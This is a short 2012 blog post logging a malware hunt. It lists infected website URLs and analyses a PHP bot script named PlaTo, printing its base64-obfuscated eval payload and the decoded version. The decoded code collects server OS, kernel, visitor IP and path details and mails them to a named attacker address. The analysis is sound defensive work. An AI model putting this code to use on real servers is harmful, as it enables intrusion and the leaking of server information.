Saturday, September 1, 2012

Hunting Log - PHP/RemoteAdmin

Just a quicky, no big deal about this, I wrote to my record & to share:

The below URLs are infected by the evil script called PlaTo is an PHP interface/IRCBot
According to filestamp infected between today to a month ago.
hxxp://jungilbooks.co.kr/gnuboard4/data/session/vero.txt hxxp://www.ccieurolam.com/cms/vero.txt hxxp://www.patriciasantoro.com.ar/help/css/vero.txt hxxp://regi.foldgazvt.hu/vero.txt
You will see the below PHP code at it:
<? $win = strtolower(substr(PHP_OS,0,3)) == "win"; echo "PLaTo<br>"; if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = " 4ON 6"; } else {$safemode = false; $hsafemode = " 3OFF 6";} $xos = wordwrap(php_uname(),90,"<br>",1); $xpwd = @getcwd(); $OS = "<<".$hsafemode.">> ".$xos.""; echo "<center><A class=ria href=\"hxxp://".$OS."\">"; echo "PLaTo</A></center><br>"; echo "<br>OSTYPE:$OS<br>"; echo "<br>Pwd:$xpwd<br>"; eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKE BpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVs c2UgeyAkc2FmZW1vZGUgPSAiT0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQU REUiJdOyAkZmxvYXQgPSAiRnJvbSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJh biA9IGV4ZWMoJ3VuYW1lIC1hOycpOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW 5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2Vi LiRpbmouIm5uU3ByZWFkIFZpYSA6ICIuJHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLi RhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNhZmVtb2RlOyBtYWlsKCJrYW1laGFtZS5kcmFnb25A Z21haWwuY29tIiwiU2V0b3JhbiBCb3MgIi4kc2FmZW1vZGUsJGJvZHksJGZsb2F0KTs=")); die("<center> ByroeNet </center>");
It's not even close to smart to encode with base64, just decode it to- get the eval value below:
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $float = "From : vurl info "; $aran = exec('uname -a;'); $web = $_SERVER["hxxp_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug hxxp://".$web.$inj. " nnSpread Via : ".$visitor. "nnKernel Version : ".$aran."nnSafe Mode: ".$safemode; mail("kamehame.dragon@gmail.com", "Setoran Bos ".$safemode,$body,$float);
It is the part of IRC Bot, I bet you will get some more IRC/Bot script in the - same directory of the infected URLs above. I am not a linguistic expert, but judging by wording is made by Indonesian (90% possibility) or Malaysian language speaking moron. These codes got in by a simple injection to the Web Server which strongly - suspected having directory traversal & file upload arbitrary flaws. As per written above, it sends mail to the botmaster kamehame.dragon@gmail.com & Sending the OS, Kernel info & path of infected urls. Just checked it in Virus Total with the below detection:
MD5: ee957307ca0b286a464260a912bfa1b7 File size: 1.2 KB ( 1193 bytes ) File name: vero.txt File type: PHP Detection ratio: 28 / 42 Analysis date: 2012-09-01 07:11:35 UTC ( 3 分 ago ) URL: [HERE]